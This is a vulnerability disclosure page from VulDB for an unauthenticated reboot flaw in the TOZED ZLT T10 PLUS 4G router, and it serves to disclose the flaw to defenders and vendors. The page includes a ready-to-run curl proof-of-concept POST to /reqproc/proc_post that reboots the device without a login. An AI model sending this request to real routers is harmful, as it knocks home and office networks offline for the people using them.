Submit #679507: TOZED ZLT T10 PLUS (ZLT family 4G CPE) T10PLUS_3.04.15 Denial of Serviceinfo

TitleTOZED ZLT T10 PLUS (ZLT family 4G CPE) T10PLUS_3.04.15 Denial of Service
Description The router’s web interface accepts an unauthenticated POST request to `/reqproc/proc_post` with `goformId=REBOOT_DEVICE` and reboots the device without requiring an active authenticated session. This allows an attacker with network access to the router (LAN or guest network depending on configuration) to remotely reboot the device, causing a denial-of-service to the home network. Proof-of-Concept (POC) HTTP request (tested on device): curl -v -X POST "http://192.168.8.1/reqproc/proc_post" \ -H "Content-Type: application/x-www-form-urlencoded;charset=utf-8" \ --data "isTest=false&uniquelogincredentials=&goformId=REBOOT_DEVICE" PoC video: https://youtu.be/3Me3wlH5cfU
Source⚠️ http://192.168.8.1/reqproc/proc_post?isTest=false&uniquelogincredentials=&goformId=REBOOT_DEVICE
User
 Anonymous User
Submission10/21/2025 22:37 (9 months ago)
Moderation11/08/2025 17:44 (18 days later)
StatusAccepted
VulDB entry331635 [TOZED ZLT T10 T10PLUS_3.04.15 Reboot /reqproc/proc_post denial of service]
Points20

Do you know our Splunk app?

Download it now for free!